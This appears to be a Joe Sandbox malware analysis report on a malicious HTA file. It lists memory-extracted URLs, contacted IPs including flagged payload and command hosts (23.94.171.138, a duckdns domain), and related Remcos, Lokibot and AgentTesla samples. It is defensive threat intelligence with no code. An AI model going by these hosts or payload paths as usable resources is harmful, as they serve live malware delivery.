                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/Vschrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/Enabled_Notice_MPArch_M1_S_Delay_GA4Kids_20230926_Anchrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.google.com/chrome/?p=blockedbchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tls-tunnel-check.googlezip.net/connect2chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://google-ohttp-relay-query.fastly-edge.com/BiddingAndScoringDebugReportingAPIKAnonymityServicechrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://lens.google.com/v3/2chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.1870823401.0000000004D88000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://nonexistent.googlezip.net/bchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://google-ohttp-relay-query.fastly-edge.com/chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2171916329.0000372001634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172600956.0000372001650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://23.94.171.138/powershell.exe, 00000001.00000002.1588165227.00000000031DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    http://crl.micropowershell.exe, 00000001.00000002.1588165227.0000000003286000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1920551053.0000000007460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.privacysandbox.combchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/2Jchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1476840604.0000000004EA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/chromesuggestionsJchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://23.94.171.138/329/createthebestthingswithgoodthingsbestforgreatthingsformeevengood.tIFLMEMpowershell.exe, 00000001.00000002.1600493692.0000000007707000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://www.google.com/accounts/serviceloginCasPol.exefalse
                                                                                                                                                		high
                                                                                                                                                https://google-ohttp-relay-join.fastly-edge.com/Wkchrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://lens.google.com/v3/upload2chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/bchrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163456123.0000372001540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173541412.00003720016B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2172416237.0000372001648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2163283126.0000372001524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173678555.00003720016BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/2(chrome.exe, 00000010.00000003.2129587008.0000372000A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2194089145.0000372002004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://google-ohttp-relay-join.fastly-edge.com/clchrome.exe, 00000010.00000003.2172805524.0000372001654000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://google-ohttp-relay-query.fastly-edge.com/ndScoringDebugReportingAPI7chrome.exe, 00000010.00000003.2174000389.00003720016D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2173814868.00003720016C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174745448.00003720016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174303481.00003720016F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174077403.00003720016E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2174226836.00003720016E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePagechrome.exe, 00000010.00000003.2129369509.00003720013C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://www.ebuddy.comCasPol.exefalse
                                                                                                                                                                  		high

                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                  Public IPs

                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                  94.245.104.56
                                                                                                                                                                  		ssl.bingadsedgeextension-prod-europe.azurewebsites.netUnited Kingdom
                                                                                                                                                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                  18.244.18.27
                                                                                                                                                                  		sb.scorecardresearch.comUnited States
                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                  142.215.209.78
                                                                                                                                                                  		ip.1017.filemail.comCanada
                                                                                                                                                                  		32156HUMBER-COLLEGECAfalse
                                                                                                                                                                  23.94.171.138
                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                  		36352AS-COLOCROSSINGUStrue
                                                                                                                                                                  239.255.255.250
                                                                                                                                                                  		unknownReserved
                                                                                                                                                                  		unknownunknownfalse
                                                                                                                                                                  192.227.228.36
                                                                                                                                                                  		nextnewupdationsforu.duckdns.orgUnited States
                                                                                                                                                                  		36352AS-COLOCROSSINGUStrue
                                                                                                                                                                  178.237.33.50
                                                                                                                                                                  		geoplugin.netNetherlands
                                                                                                                                                                  		8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                  172.217.16.193
                                                                                                                                                                  		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                  		15169GOOGLEUSfalse

                                                                                                                                                                  Private

                                                                                                                                                                  IP
                                                                                                                                                                  127.0.0.1

                                                                                                                                                                  General Information

                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                  Analysis ID:1557815
                                                                                                                                                                  Start date and time:2024-11-18 16:51:18 +01:00
                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                  Overall analysis duration:0h 11m 53s
                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                  Report type:full
                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                  Number of analysed new started processes analysed:36
                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                  Technologies:
                                                                                                                                                                  • HCA enabled
                                                                                                                                                                  • EGA enabled
                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                  Sample name:seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta
                                                                                                                                                                  Detection:MAL
                                                                                                                                                                  Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@69/150@25/9
                                                                                                                                                                  EGA Information:
                                                                                                                                                                  • Successful, ratio: 55.6%
                                                                                                                                                                  HCA Information:
                                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                                  • Number of executed functions: 194
                                                                                                                                                                  • Number of non-executed functions: 262
                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                  • Found application associated with file extension: .hta
                                                                                                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                  Warnings

                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.42.16, 204.79.197.203, 216.58.212.142, 204.79.197.239, 13.107.21.239, 13.107.6.158, 2.19.126.145, 2.19.126.152, 48.209.144.71, 2.23.209.177, 2.23.209.158, 2.23.209.176, 2.23.209.149, 2.23.209.161, 2.23.209.179, 2.23.209.148, 2.23.209.160, 2.23.209.150, 184.28.90.27, 172.205.25.163, 88.221.110.195, 88.221.110.179, 2.23.209.187, 2.23.209.181, 2.23.209.130, 2.23.209.189, 2.23.209.185, 2.23.209.133, 2.23.209.182, 23.38.98.114, 23.38.98.71, 23.38.98.69, 23.38.98.115, 23.38.98.117, 23.38.98.120, 23.38.98.119, 23.38.98.121, 23.38.98.118, 13.74.129.1, 13.107.21.237, 204.79.197.237
                                                                                                                                                                  • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, fs-wildcard.microsoft.com.edgekey.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, prod-agic-ne-9.northeurope.cloudapp.azure.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, wildcardtlu-ssl.azureedge.net, a1834.dscg2.akamai.net, c.bing.com, clients.l.google.com, prod-agic-ne-7.northeurope.cloudapp.azure.com, config.edge.skype.com.trafficmanager.net, c-msn-co
                                                                                                                                                                  • Execution Graph export aborted for target mshta.exe, PID 7528 because there are no executed function
                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7628 because it is empty
                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 8092 because it is empty
                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                  • VT rate limit hit for: seethebestthingswhichhappenedentiretimewithgreattimebacktohere.hta

                                                                                                                                                                  Simulations

                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                  10:52:16API Interceptor151x Sleep call for process: powershell.exe modified
                                                                                                                                                                  10:53:32API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                  10:53:35API Interceptor3362299x Sleep call for process: CasPol.exe modified

                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                  IPs

                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                  142.215.209.78Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                    kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                      bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                        Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                          Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                            SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                    Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                      23.94.171.138Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                      • 23.94.171.138/329/FRSSDE.txt
                                                                                                                                                                                      Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                      • 23.94.171.138/121/WRFRTTR.txt
                                                                                                                                                                                      seethebstpricewithbestthinghappingwithgoodnews.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                      • 23.94.171.138/350/WHTGODS.txt
                                                                                                                                                                                      Shipment_details.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                      • 23.94.171.138/350/WHTGODS.txt
                                                                                                                                                                                      94.245.104.56FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                              Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                          18.244.18.27file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                            http://www.drawnames.com/wishlist/add/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-Get hashmaliciousUnknownBrowse

                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              ip.1017.filemail.comOrder_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 142.215.209.78
                                                                                                                                                                                                                              ssl.bingadsedgeextension-prod-europe.azurewebsites.netFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                                                                              geoplugin.netFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              download.exeGet hashmaliciousRemcos, XWormBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              file.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              EIesXTUPI9.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              OrderBJ 02 - JUNMA016118313306,pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              Quotation.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 178.237.33.50
                                                                                                                                                                                                                              sb.scorecardresearch.comFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 18.244.18.27
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.27
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.27
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 3.161.82.127
                                                                                                                                                                                                                              Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.38
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.38
                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 3.161.82.20
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                              • 18.244.18.122
                                                                                                                                                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.32
                                                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                              • 18.244.18.38

                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                              AS-COLOCROSSINGUSFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 192.227.228.36
                                                                                                                                                                                                                              Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                                              • 192.227.228.36
                                                                                                                                                                                                                              kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 192.3.243.136
                                                                                                                                                                                                                              bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                                              • 192.3.243.136
                                                                                                                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 107.173.4.61
                                                                                                                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.3.220.29
                                                                                                                                                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 192.3.243.136
                                                                                                                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                              • 192.3.243.136
                                                                                                                                                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 107.173.4.61
                                                                                                                                                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                              • 192.3.220.29
                                                                                                                                                                                                                              AMAZON-02USFRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                              • 18.245.124.3
